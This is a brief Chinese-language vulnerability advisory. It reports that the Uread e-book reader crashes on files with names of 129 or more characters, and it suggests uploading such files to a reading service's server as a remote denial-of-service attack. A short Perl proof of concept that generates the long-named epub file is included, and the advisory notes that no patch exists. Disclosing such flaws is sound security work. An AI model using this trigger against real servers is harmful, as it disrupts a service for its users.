Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。 远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端,实现远程拒绝服务攻击。 测试证明 ———————————————————– #!/usr/bin/perl -w $filename="a"x129; print "——Generate testfile \\"a\\"x129.epub——\\n"; open(TESTFILE, ">$filename.epub"); sleep(3); close(TESTFILE); print "——Complete!——\\n"; exit(1); ———————————————————– 修复方案: 目前厂商还没有提供补丁或者升级程序。 作者 demonalex
